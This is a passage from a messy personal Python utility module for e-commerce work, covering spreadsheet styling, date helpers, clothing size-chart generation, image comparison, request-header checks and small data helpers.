"fill": _pickle.dumps(copy.copy(column[1].fill)),
"font": _pickle.dumps(copy.copy(column[1].font)),
"width": _pickle.dumps(copy.copy(column[1].parent.column_dimensions[column[1].column].width)),
"alignment": _pickle.dumps(copy.copy(column[1].alignment)),
"border": _pickle.dumps(copy.copy(column[1].border))
}
workbook_sheet_styles[sheetname] = sheet_styles
_pickle.dump(workbook_sheet_styles, open(homepath("~/tavern/tavern/bag/.workbook_sheet_styles.pkl"), "wb"))
return workbook_sheet_styles
def xlsx_filter(self, ws):
import openpyxl
maxcolumnletter = openpyxl.utils.get_column_letter(ws.max_column)
ws.auto_filter.ref = 'A1:'+maxcolumnletter+str(len(ws['A']))
def xlsx_cell(self, cell, fgColor="000000", font_color="000000", column_width=None, font_size=5, font_name="Calibri", shrink_to_fit=True, vertical="top", border_style="hair", number_format="0.00"):
import openpyxl
import decimal
[setattr(cell,"fill",openpyxl.styles.PatternFill(fgColor=fgColor, fill_type="solid")) , setattr(cell, "font", openpyxl.styles.Font(size=font_size,name=font_name,color=font_color)) , setattr(cell.parent.column_dimensions[cell.column],"width",column_width) if column_width != None else None , setattr(cell, "alignment", openpyxl.styles.Alignment(shrink_to_fit=shrink_to_fit,vertical=vertical,horizontal="general",wrap_text=False,indent=0,text_rotation=0)) , setattr(cell,"border",openpyxl.styles.borders.Border(left=openpyxl.styles.borders.Side(style=border_style),right=openpyxl.styles.borders.Side(style=border_style),top=openpyxl.styles.borders.Side(style=border_style),bottom=openpyxl.styles.borders.Side(style=border_style))) , setattr(cell, "number_format", "0.00")]# if 1 == tryprocess(lambda i: 1/0 if decimal.Decimal(str(i)).as_tuple().exponent.__abs__() >= 5 else 1, i=cell.value) else 1 ]
class Date(object):
def __init__(self, _str=None, b=None):
if _str is None: _str = datetime.now()
self.datestr = self.autodate(_str)
self.dateobj = self.autodateobj(_str).replace(tzinfo=None)
self.datetime = datetime
self.now = datetime.now
def myTimedelta(self, years=0, days=0, hours=0, minutes=0, seconds=0, ):
seconds = seconds
seconds = seconds + (minutes*60)
seconds = seconds + (hours*3600)
seconds = seconds + (days*86400)
seconds = seconds + (years*31536000)
seconds = seconds + (86400*len([i for i in list(range(datetime.now().date().year,datetime.now().date().year+29)) if i%4==0]))
return timedelta(seconds=seconds)
def autodate(self, _str):
_str = _str.split(' ')[0] if type(_str) == str and ' ' in _str else _str
try:_str = datetime.strftime(_str,'%Y-%m-%d') if type(_str) != str else _str
except: _str = datetime.strftime(_str.dateobj,'%Y-%m-%d') if type(_str) != str else _str
import re
m,d,Y='06','06','2006'
Ymd = re.findall(r'(....[/:-].*[/:-].*)',_str)
mdY = re.findall(r'(.*[/:-].*[:/-]....)',_str)
if len(Ymd) > 0:
Ymd = re.sub(r'([:/-])','#',Ymd[0])
Y,m,d = Ymd.split('#')
elif len(mdY) > 0:
mdY = re.sub(r'([:/-])','#',mdY[0])
m,d,Y = mdY.split('#')
try:
if len(m) == 1:
m = '0%s' % m
if len(d) == 1:
d = '0%s' % d
except Exception as e:
print(e)
return '-'.join([Y,m,d])
def autodateobj(self, _str):
return datetime.strptime(self.autodate(_str),'%Y-%m-%d')
def strftime(self, srftime_string):
return self.dateobj.strftime(srftime_string)
def __repr__(self):
return self.datestr
def __sub__(self, _str):
if type(_str) == int:
return Date(self.dateobj - timedelta(_str))
else:
return (self.dateobj - Date(_str).dateobj).days
def __add__(self, _str):
if type(_str) == int:
return Date(self.dateobj + timedelta(_str))
def __lt__(self, _str):
return self.dateobj < Date(_str).dateobj
def __gt__(self, _str):
return self.dateobj > Date(_str).dateobj
def __eq__(self, _str):
if tryprocess(lambda:Date(_str)) == 0:
return False
return self.dateobj == Date(_str).dateobj
def __call__(self):
return self.dateobj
def datelist(self, x):
return [Date(datetime.today() - timedelta(i*1)) for i in sorted(range(x),reverse=True)]
def dt(self=None, x=0, strf='%Y-%m-%d'):
return (datetime.now() + timedelta(x)).strftime(strf)
@staticmethod
def myDate():
x = datetime.now()
y = datetime.now().year
d1_of_year = datetime(y, 1, 1)
z = (datetime.today() - d1_of_year).days
return z
@staticmethod
def myDatetimenow(dateobj = None, round_count = 4):
#print("hello, myDatetimenow is running now")
dateobj = datetime.now() if dateobj == None else dateobj.replace(tzinfo=None)
dateobj_year_str = str(dateobj.year)[-2:]
a = int(dateobj_year_str) * 1000
mydatetimenow_inside_the_day = ((dateobj.hour * 60 * 60) + (dateobj.minute*60) + dateobj.second)/(24*60*60)
mydatetimenow_from_yearstart = (dateobj - datetime(dateobj.year-1, 12, 31)).days
mydatetimenow = a + mydatetimenow_inside_the_day + mydatetimenow_from_yearstart
mydatetimenow = round(mydatetimenow, round_count) #
#print("%s->%s"%(dateobj,mydatetimenow))
return mydatetimenow
@staticmethod
def myUndatetimenow(x):
year = int(x/1000) + 2000
datetime_ = datetime(year,1,1)
seconds = (x - int(x)) * (24*60*60)
days = int(x - int(x/1000) * 1000)
return datetime_+timedelta(days=days-1, seconds=seconds)
def Now(self):
return datetime.now()
@staticmethod
def date(self):
return self.dateobj
def str(self):
return self.datestr
def get_month_range(self,x,year):
y = {1:[Date("01/01/%s"%(year)),Date("01/31/%s"%(year))],2:[Date("02/01/%s"%(year)),Date("02/29/%s"%(year))if(year%4 == 0)else(Date("02/28/%s"%(year)))],3:[Date("03/01/%s"%(year)),Date("03/31/%s"%(year))],4:[Date("04/01/%s"%(year)),Date("04/30/%s"%(year))],5:[Date("05/01/%s"%(year)),Date("05/31/%s"%(year))],6:[Date("06/01/%s"%(year)),Date("06/30/%s"%(year))],7:[Date("07/01/%s"%(year)),Date("07/31/%s"%(year))],8:[Date("08/01/%s"%(year)),Date("08/31/%s"%(year))],9:[Date("09/01/%s"%(year)),Date("09/30/%s"%(year))],10:[Date("10/01/%s"%(year)),Date("10/31/%s"%(year))],11:[Date("11/01/%s"%(year)),Date("11/30/%s"%(year))],12:[Date("12/01/%s"%(year)),Date("12/31/%s"%(year))]}
return y[datetime.strptime(x,"%B").month]
@staticmethod
def friendlydate(x, only_date=False,**kwargs):
return swamp([lambda:datetime.strftime(x,"%A, %b %d"),
lambda:datetime.strftime(x,"%A, %b %d'%y"),
lambda:datetime.strftime(x,("%A, %b %d'%y at %I:%M %p")),
lambda:datetime.strftime(x,("%A, %b %d'%y at %I:%M:%S %p")),
lambda:datetime.strftime(x,("%A, %b %d' at %I:%M:%S %p")),
lambda:datetime.strftime(x,("%A, %b %d at %I:%M %p")),
],
[lambda:only_date==True and "with_year" not in kwargs,
lambda:only_date==True and "with_year" in kwargs,
lambda:only_date==False and "with_year" in kwargs and "seconds" not in kwargs ,
lambda:only_date==False and "with_year" in kwargs and "seconds" in kwargs,
lambda:only_date==False and "with_year" not in kwargs and "seconds" in kwargs,
lambda:only_date==False and "with_year" not in kwargs and "seconds" not in kwargs ,],)
"""
assert Date().friendlydate(datetime(2019,1,21,1,11)) == 'Monday, Jan 21 at 01:11 AM'
assert Date().friendlydate(datetime(2019,1,21,1,11),with_year=True) == "Monday, Jan 21'19 at 01:11 AM"
assert Date().friendlydate(datetime(2019,1,21,1,11),seconds=True) == "Monday, Jan 21' at 01:11:00 AM"
assert Date().friendlydate(datetime(2019,1,21,1,11),seconds=True,with_year=True) == "Monday, Jan 21'19 at 01:11:00 AM"
assert Date().friendlydate(datetime(2019,1,21,1,11),only_date=True) == 'Monday, Jan 21'
assert Date().friendlydate(datetime(2019,1,21,1,11),only_date=True,with_year=True) == "Monday, Jan 21'19"
"""
def seconds_to_text(self,x,days=True,hours=True,minutes=True,seconds=True):
x = int(x)
days_ = None
days_r = None
if days:
q = 24*60*60
days_ = int(x/q)
days_r = x%q
x = days_r
hours_ = None
hours_r = None
if hours:
q = 60*60
hours_ = int(x/q)
hours_r = x%q
x = hours_r
minutes_ = None
minutes_r = None
if minutes:
q = 60
minutes_ = int(x/q)
minutes_r = x%q
x = minutes_r
seconds_ = None
seconds_r = None
if seconds:
q = 1
seconds_ = int(x/q)
seconds_r = x%q
x = seconds_r
r = ""
if days:
r += "%s Days"%(days_)
r += ", "
if hours:
r += "%s Hours"%(hours_)
r += ", "
if minutes:
r += "%s Minutes"%(minutes_)
r += ", "
if seconds:
r += "%s Seconds"%(seconds_)
r += ", "
if r.endswith(", "):
r = r[:-2]
return r
def adjust_mydatetimenow__(self, data, field):
for x in data:
i = getattr(x, field)
if i < 200:
ii=i
#b.append(len(str(i)))
i = str(i)
d = str(i)[:2]
if len(i) == 5:
i = i + "0"
i = i[2:]
#print(i)
dd = (float(d)*1000)+float(i)
#print(dd)
setattr(x, field, dd)
x.save();print("saving %s->%s" %(ii,dd))
elif i < 10000:
ii=i
#print(i)
d = str(i)[:2]
i=str(i)
if len(i) != 7:
while True:
i = i+"0"
if len(i)==7:
break
i = i[2:]
dd = (float(d)*1000) + float(i)
print(dd)
setattr(x, field, dd)
x.save();print("saving %s->%s" %(ii,dd))
@staticmethod
def pastmonthdays(x):
from calendar import monthrange
count = 0
count += ((datetime.now())- datetime(datetime.now().year,datetime.now().month,1)).days
year = datetime.now().year
month = datetime.now().month
for i in range(x):
month -= 1
if month == 0:
year -= 1
month = 12
count += monthrange(year, month)[1]
print(year, month, count)
print(count)
time.sleep(0.2)
return count
def parse_date(self,w,remove_tzinfo=True,localize_timezone=False):
import dateutil.parser
x = dateutil.parser.parse(w)
y = x.astimezone()if(localize_timezone==True)else(x)
z = y.replace(tzinfo=None)if(remove_tzinfo==True)else(y)
return z
class DefensiveProgrammingBot:
@staticmethod
def defend_DefensiveProgrammingBot(io):
formats = [io, io==io]
redprint("""\nio:{}\nio==io:{}""".format(*formats))
returnable = None
assert None == returnable
return returnable
class Freelancer:
def Description(self, a):
pass
""" """
def SizeChart(self, a, html=True):
# OSA.log(a)
if "Alg1:" in a:
xz = ""
if a.endswith("&cm"):
xz = a
#a='Waist,Bust,Hips&Alg1:S-6XL,34-50,24-42,34-52'
#a='Waist,Bust,Hips&Alg1:S-6XL,34-50,24-42,34-52&cm'
# not for floats
#shints = ["Size"]+[i+" (in)" for i in eval(a.split("&")[0])]
# x-y, x-y, x-y, x-y
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg1:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg1:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg1:","").split(",",1)[1].split(",")
vorts = []
for idx, vax in enum(F):
quas = Integer(vax.split("-")[1]) - Integer(vax.split("-")[0])
stol = Integer(quas / len(chus))
h = Integer(vax.split("-")[0])
lp = len(chus)
qince = []
for i in range(lp):
print(h+(stol*i), h+(stol * (i+1)))
print(h+(stol*i), h+(stol * (i+1)))
#qince.append("-".join(lmap(str,[h+(stol*i), h+(stol * (i+1))])))
qince.append(" - ".join(lmap(str,[ str(h+(stol*i))+'"', str(h+(stol * (i+1)))+'"' ])))
vorts.append(["%s"%shints[idx+1]]+qince)
vorts.insert(0, ["Size"]+chus)
if xz.endswith("&cm"):
for idx,i in enum(vorts):
for idx2,j in enum(i):
if j.endswith('"'):
q = re.findall("[\d\.]+",j)
for l in q:
ll = round(float(l)/2.54,2)
if str(ll).endswith(".0"):
ll = str(int(ll))
else:
ll = str(float(ll))
j = j.replace(l, ll)
vorts[idx][idx2] = j
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
if "Alg2" in a:
# a = "Bust,Waist,Length&Alg2:S-2XL,88-104,72-88,104-108"
# a = "Bust,Waist,Length&Alg2:S-2XL,88-104,72-88,104-108&cm"
# a = "Bust,Waist,Length&Alg2:S-2XL,88.5-104.5,72.5-88.5,104.5-108.5&cm"
# x, x, x, x
xz = ""
if a.endswith("&cm"):
xz = a
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg2:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg2:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg2:","").split(",",1)[1].split(",")
vorts = []
for idx, i in enum(F):
a,b = i.split("-")
a = float(a)
b = float(b)
t = b- a
tt = t / (len(chus) - 1)
ly = a
o = []
for j in range(len(chus)):
if str(ly).endswith(".0"):
lyy = str(int(ly)) + '"'
else:
lyy = str(round(ly,1)) + '"'
o.append(lyy)
ly += tt
o.insert(0, shints[idx+1])
vorts.append(o)
vorts.insert(0, ["Size"] + chus)
if xz.endswith("&cm"):
for idx,i in enum(vorts):
for idx2,j in enum(i):
if j.endswith('"'):
q = str(round(float(re.findall("[\d\.]+",j)[0])/2.54,2))
if q.endswith(".0"):
q = int(q)
else:
q = float(q)
q = str(q)
vorts[idx][idx2] = q + '"'
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
if "Alg3" in a:
# a = 'Bust,Waist,Hips&Alg3:S-6XL,80+5*5+7+5+5+5,60+5*5+7+5*2+5,80+5*5+7+5*2+5&cm'
# a = 'Waist,Hips,Length&Alg3:S-6XL,67+5+5+5+5+5+5+5+5,93+5+5+5+5+5+5+5+5,72.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5&cm'
# x-y, x-y, x-y, x-y
xz = ""
if a.endswith("&cm"):
xz = a
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg3:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg3:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg3:","").split(",",1)[1].split(",")
vorts = []
for idx, i in enum(F):
q = []
start = re.findall("[\d\.]+",i)[0]
i = re.sub(start,"",i,count=0)
l = []
l.extend(re.findall("\+[\d\.]+(?:\*[\d\.]+|)",i))
start = float(start)
if str(start).endswith(".0"):
start = int(start)
q.append(start)
for j in l:
if "*" not in j:
y = re.findall("\+([\d\.]+)",j)[0]
y = float(y)
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
else:
x = re.findall("\*([\d\.]+)",j)[0]
y = re.findall("\+([\d\.]+)",j)[0]
x = float(x)
y = float(y)
for r in range(x):
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
vorts.append(q)
for idx, i in enum(vorts):
for idx2, j in enum(i[:-1]):
if "&cm" in a:
j = round(float(j/2.54),2)
if str(j).endswith(".0"):
j = str(int(j))
else:
j = str(float(j))
r = i[idx2+1]
if "&cm" in a:
r = round(float(r/2.54),2)
if str(r).endswith(".0"):
r = str(int(r))
else:
r = str(float(r))
vorts[idx][idx2] = '%s" - %s"'%(j,r)
vorts[idx].pop(-1)
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
for idx, i in enum(vorts):
i.insert(0, chus[idx])
vorts = [shints] + vorts
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
if "Alg4" in a:
# a = 'Bust,Waist,Hips&Alg4:S-6XL,80+5*5+7+5+5,60+5*5+7+5*2,80+5*5+7+5*2&cm'
# a = 'Waist,Hips,Length&Alg4:S-6XL,67+5+5+5+5+5+5+5+5,93+5+5+5+5+5+5+5+5,72.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5&cm'
# x, x, x, x
xz = ""
if a.endswith("&cm"):
xz = a
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg4:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg4:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg4:","").split(",",1)[1].split(",")
vorts = []
for idx, i in enum(F):
q = []
start = re.findall("[\d\.]+",i)[0]
i = re.sub(start,"",i,count=0)
l = []
l.extend(re.findall("\+[\d\.]+(?:\*[\d\.]+|)",i))
start = float(start)
if str(start).endswith(".0"):
start = int(start)
q.append(start)
for j in l:
if "*" not in j:
y = re.findall("\+([\d\.]+)",j)[0]
y = float(y)
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
else:
x = re.findall("\*([\d\.]+)",j)[0]
y = re.findall("\+([\d\.]+)",j)[0]
x = float(x)
y = float(y)
for r in range(x):
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
vorts.append(q)
for idx, i in enum(vorts):
for idx2, j in enum(i):
if "&cm" in a:
j = round(float(j/2.54),2)
if str(j).endswith(".0"):
j = str(int(j))
else:
j = str(float(j))
vorts[idx][idx2] = '%s"'%(j)
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
for idx, i in enum(vorts):
i.insert(0, chus[idx])
vorts = [shints] + vorts
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
#a = '["waist", "chest", "shoulders"]\nS:10,20,30\nM:11,22,33\nL:12,24,35'
#a = 'waist,chest,shoulders&S:10,20,30&M:11,22,33&L:12,24,35'
#a = 'Diameter&Adjustable Size:17mm'
strom = dict(zip(re.findall("(&(?:[0-9]+|[0-9]+[\w]+)):",a), set([generate_one_alphabetical_string() for i in range(10000)]))) # ie &2XL.
for zeknos, zsadf in strom.items():
a = a.replace(zeknos, "%s:"%(zsadf))
a = Replacements(a, "XXXXXXL", "6XL", "XXXXXL", "5XL", "XXXXL", "4XL", "XXXL", "3XL", "XXL", "2XL")
#@[2018.12.31 12:05:33 PM]tcer strom
for zeknos, zsadf in strom.items():
a = a.replace("%s:"%(zsadf), zeknos, )
#shints = ["Size"]+[i+" (in)" for i in eval(a.split("&")[0])]
shints = ["Size"]+[i for i in a.replace("&cm","").split("&")[0].split(",")]
#stromus = [ [xe.split(":")[0]]+(list(eval(xe.split(":")[1]))) for xe in a[1:]]
# OSA.log(a)
stromus = [ [xe.split(":")[0]]+[((i)if("-" not in i)else(i.split("-")[0].strip()+'"' + (" - ") + i.split("-")[1].strip() ))+(ifelseget(lambda:("mm" in i),lambda:"",lambda:'"')) for i in list(map(str,xe.split(":")[1].split(",")))] for xe in a.replace("&cm","").split("&")[1:] ]
vorts = [shints]+stromus
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if a.endswith("&cm"):
for idx,i in enum(vorts):
for idx2,j in enum(i):
if j.endswith('"'):
q = re.findall("[\d\.]+",j)
for l in q:
ll = round(float(l)/2.54,2)
if str(ll).endswith(".0"):
ll = str(int(ll))
else:
ll = str(float(ll))
j = j.replace(l, ll)
vorts[idx][idx2] = j
#@decidedly inappreciate, csv_table_to_png(vorts)
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
class Graph(object):
def __init__(self, *args, plot_type='scatterplot',**kwargs):
import matplotlib.pyplot as plt
ifdo(lambda:not os.path.exists(homepath("~/.matplotlib")),lambda:os.system("mkdir ~/.matplotlib && touch ~/.matplotlib/matplotlibrc && echo 'backend: agg' >> ~/.matplotlib/matplotlibrc"))
ifdo(lambda:kwargs.get("newplot")==True,lambda:plt.subplot(self.plot_number))
ifdo(lambda:plot_type=="lineplot",lambda:plt.plot(*args, "-", label=kwargs.get("label",None)))
ifdo(lambda:plot_type=="scatterplot",lambda:plt.plot(*args, "."))
ifdo(lambda:plot_type=="histogram",lambda:plt.hist(*args, bins=20))
plt.xlabel(kwargs.get("xlabel","x")), plt.ylabel(kwargs.get("ylabel","y")), plt.title(kwargs.get("title","title")), plt.legend()
plt.show()
class Handles:
# Basically, it shows the day's sales for all shops, as well and if clicked, shows the adsets.
def __init__(self):
import rumps
from rumps import MenuItem as M
from rumps import MenuItem
self.app = rumps.App("🚀",quit_button=Null)
globals().update(locals())
self.set_menu()
#process( lambda: [time.sleep(6.15), self.set_menu()] )
time.sleep(6)
self.app.run()
def set_menu(self):
keys = list(self.app.menu.keys())
redprint(keys)
for i in keys:
self.app.menu.pop(i)
keycall("Icon",All(Adset))
keycall("post_handle",All(Adset))
self.app.menu = [MenuItem("/",callback=lambda _=None:[keycall("post_handle",All(Adset)),keycall("__call__",All(Handle)),self.set_menu()])]+\
[
MenuItem("[%s]"%(i.reach),icon=Filter(Adset,handle=i.handle)[0].Icon()) for i in keysort("reach",All(Handle),tcer=True)
]
class Headers:
def verifyheaders(self,headers=None,url=None,text=None,savefile=None,minimal_headers=None):
"""
minimal_headers=headerdict1
url='https://app.oberlo.com/ajax/import/save-title'
savefile='headers/headers1.pkl'
headers=headers1
text=''
"""
"""
headers={}
headerdict1={'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9', 'Cache-Control': 'max-age=0', 'Connection': 'keep-alive', 'Cookie': None, 'Host': 'app.oberlo.com', 'Referer': 'https://app.oberlo.com/my-products?page=1&filters%5Bkeywords%5D=&filters%5Bsync_prices_status%5D=0&filters%5Bgone_status%5D=0&filters%5Bsource%5D=0', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-User': '?1', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}
minimal_headers=headerdict1
url='https://app.oberlo.com/import'
savefile='headers/headers1.pkl'
text=''
"""
saved=copy.deepcopy(headers)
if minimal_headers:
minimal_headers.update({i:j for i,j in headers.items() if i in minimal_headers})
headers = minimal_headers
print(headers)
r=requests.get(url,headers=headers,timeout=3)
if r.url==url and r.status_code==200:
headers = [print('verified url and status code for %s'%(url)),saved][1]
else:
headers = [print('refresh headers'),self.verifyheaders(headers=self.inputheaders(text,savefile=savefile),url=url,text=text,savefile=savefile,minimal_headers=minimal_headers)][1]
return headers
def inputheaders(self,text=None,savefile=None):
headers = [input('Please clip your headers for %s, then press Enter:\n'%(text)),blocktext_to_session_headers(pyperclip.paste().replace('\r',''))].pop()
ifdo(lambda:savefile,lambda:Pickles().savepickles(headers,savefile))
return headers
class ImageComp:
def __call__(self,i1,i2,verbose = False):
self.verbose = verbose
# B = pool(Images().download,key("src",product.images))
# [[[i,j] for j in B if j!=i] for i in B]
from PIL import Image
from skimage.measure import compare_ssim as ssim
import argparse
import cv2
import imutils
import matplotlib.pyplot as plt
import numpy as np
g().update(locals())
self.fn1 = i1
self.fn2 = i2
self.i1 = cv2.imread(i1)
self.i2 = cv2.imread(i2)
self.resize()
self.test_pass_score = GLOBAL_IMAGE_COMPARISON_TEST_SCORE
return self.compare_images()
def resize(self):
shape1 = list(self.i1.shape)[:2]
if self.verbose: redprint("shape1: %s" % shape1)
shape2 = list(self.i2.shape)[:2]
if self.verbose: redprint("shape2: %s" % shape2)
if sum(shape1) > sum(shape2):
Images().resize_disregard_proportion(shape1[1], shape1[0], self.fn2, self.fn2)
if self.verbose: redprint("shape1: %s -> %s" % (shape2, (shape1[1], shape1[0])))
self.i2 = cv2.imread(self.fn2)
if self.verbose: redprint("reinitializing image %s" % "self.fn2")
shape2 = list(self.i2.shape)[:2]
if self.verbose: redprint("shape1: %s, shape2: %s" % (shape1, shape2))
if sum(shape1) < sum(shape2):
Images().resize_disregard_proportion(shape2[1], shape2[0], self.fn1, self.fn1)
if self.verbose: redprint("shape1: %s -> %s" % (shape1, (shape2[1], shape2[0])))
self.i1 = cv2.imread(self.fn1)
if self.verbose: redprint("reinitializing image %s" % "self.fn1")
shape1 = list(self.i1.shape)[:2]
if self.verbose: redprint("shape1: %s, shape2: %s" % (shape1, shape2))
else:
if self.verbose: redprint("images already same size: %s %s" % (shape1, shape2))
def mse(self):
import numpy as np
err = np.sum((self.i1.astype("float") - self.i2.astype("float")) ** 2)
err /= float(self.i1.shape[0] * self.i1.shape[1])
return err
def compare_images_2014(self):
m = self.mse()
s = None
try:s = ssim(self.i1, self.i2)
except: s = ssim(self.i1, self.i2, multichannel=True)
if self.verbose: redprint("m, %s s, %s" % (m, s))
return True if s > self.test_pass_score else False
def compare_images_2017(self):
grayA = cv2.cvtColor(self.i1, cv2.COLOR_BGR2GRAY)
grayB = cv2.cvtColor(self.i2, cv2.COLOR_BGR2GRAY)
(score, diff) = ssim(grayA, grayB, full=True)
diff = (diff * 255).astype("uint8")
if self.verbose: redprint("s: {}".format(score))
return True if score > self.test_pass_score else False
def compare_images(self):
alg1 = self.compare_images_2014()
alg2 = self.compare_images_2017()
if self.verbose: redprint("alg1: %s | alg2: %s" % (alg1, alg2))
return True if(True==alg1==alg2)else(False)
class Inheritance:
class Inheritor:
__call__=lambda self,x:[exec("from types import MethodType,ModuleType,FunctionType",globals()),[(bind3(self,b))if(type(b)==FunctionType)else(setitem(self.__dict__,a,b))for a,b in(B.__dict__.items())]]
pram=lambda self: print("a")
poof=lambda self: print("AA")
class B:
pram=lambda self: print("b")
poof=lambda self: print("BB")
"""
a = Inheritor()
a.pram()
a.poof()
a(B)
a.pram()
a.poof()
"""
class Itertools:
def __init__(self):
import itertools
import string
globals().update(locals())
globals().update({a:getattr(self,a) for a in dir(self)})
def set_of_ordered_set(self,x,ordered_set_size):
return list(itertools.permutations(x,ordered_set_size))
""" test """
"""x = list(range(10))
ordered_set_size = 3
a = set_of_ordered_set(x,ordered_set_size)
print(len(a))
720"""
def set_of_unordered_set(self,x,unordered_set_size):
return list(itertools.combinations(x,unordered_set_size))
""" test """
"""x = list(range(10))
unordered_set_size = 3
b = set_of_unordered_set(x,unordered_set_size)
print(len(b))
120"""
def set_of_unordered_set_with_replacement(self,x,unordered_set_with_replacement_set_size):
return list(itertools.combinations_with_replacement(x,unordered_set_with_replacement_set_size))
""" test """
"""x = list(range(10))
unordered_set_with_replacement_set_size = 3
c = set_of_unordered_set_with_replacement(x,unordered_set_with_replacement_set_size)
print(len(c))
220"""
def set_of_ordered_and_unordered_and_unordered_with_replacement_set(self,x,ordered_and_unordered_and_unordered_with_replacement_set_size):
ordered_set = set_of_ordered_set(x,ordered_set_size=ordered_and_unordered_and_unordered_with_replacement_set_size)
unordered_set = set_of_unordered_set(x,unordered_set_size=ordered_and_unordered_and_unordered_with_replacement_set_size)
unordered_set_with_replacement = set_of_unordered_set_with_replacement(x,unordered_set_with_replacement_set_size=ordered_and_unordered_and_unordered_with_replacement_set_size)
x = sum([ordered_set,unordered_set,unordered_set_with_replacement],[])
# x = set(x)
x = set(x)
return x
def set_of_ordered_and_unordered_and_unordered_with_replacement_set_for_alphabet(self,):
import string
x = " ".join(string.ascii_lowercase).split(" ")
y = set_of_ordered_and_unordered_and_unordered_with_replacement_set(x,ordered_and_unordered_and_unordered_with_replacement_set_size=4)
z = set(y)
a = ["".join(i) for i in z]
return a
""" test """
"""x = set_of_ordered_and_unordered_and_unordered_with_replacement_set_for_alphabet()
In [45]: len(x)
Out[45]: 367601"""
def set_product(self,x,repeat_set_size):
""" ::: lol try out [1,2,3,2,1],3 . your first thing, it had 25, this has 27. This seems to be that thing which you would have wanted. ::: """
x = list(itertools.product(x,repeat=repeat_set_size))
return x
class LinReg:
def __init__(self):
from sklearn.linear_model import LinearRegression
globals().update(locals())
def fit(self, X, y):
self.X = X
self.y = y
self.LinReg = LinearRegression()
self.LinReg.fit(X,y)
def score(self):
print( self.LinReg.score(self.X,self.y) )
def predict(self, x):
y = self.LinReg.predict([[x]])
return y
def dictlist_predict(self,x,fields,y_field):
X = []
for i in x:
X.append([i[v] for v in fields])
y = [i[y_field] for i in x]
new = LinReg()
new.fit(X,y)
return new
class Locations:
states = { 'AK': 'Alaska', 'AL': 'Alabama', 'AR': 'Arkansas', 'AS': 'American Samoa', 'AZ': 'Arizona', 'CA': 'California', 'CO': 'Colorado', 'CT': 'Connecticut', 'DC': 'District of Columbia', 'DE': 'Delaware', 'FL': 'Florida', 'GA': 'Georgia', 'GU': 'Guam', 'HI': 'Hawaii', 'IA': 'Iowa', 'ID': 'Idaho', 'IL': 'Illinois', 'IN': 'Indiana', 'KS': 'Kansas', 'KY': 'Kentucky', 'LA': 'Louisiana', 'MA': 'Massachusetts', 'MD': 'Maryland', 'ME': 'Maine', 'MI': 'Michigan', 'MN': 'Minnesota', 'MO': 'Missouri', 'MP': 'Northern Mariana Islands', 'MS': 'Mississippi', 'MT': 'Montana', 'NA': 'National', 'NC': 'North Carolina', 'ND': 'North Dakota', 'NE': 'Nebraska', 'NH': 'New Hampshire', 'NJ': 'New Jersey', 'NM': 'New Mexico', 'NV': 'Nevada', 'NY': 'New York', 'OH': 'Ohio', 'OK': 'Oklahoma', 'OR': 'Oregon', 'PA': 'Pennsylvania', 'PR': 'Puerto Rico', 'RI': 'Rhode Island', 'SC': 'South Carolina', 'SD': 'South Dakota', 'TN': 'Tennessee', 'TX': 'Texas', 'UT': 'Utah', 'VA': 'Virginia', 'VI': 'Virgin Islands', 'VT': 'Vermont', 'WA': 'Washington', 'WI': 'Wisconsin', 'WV': 'West Virginia', 'WY': 'Wyoming'}
_country_code_dict = {
'c0': 'US',
'c1': 'CA,AU,UK,NZ',
'c2': 'CN,TW,HK,SG,JP,UA,RU',
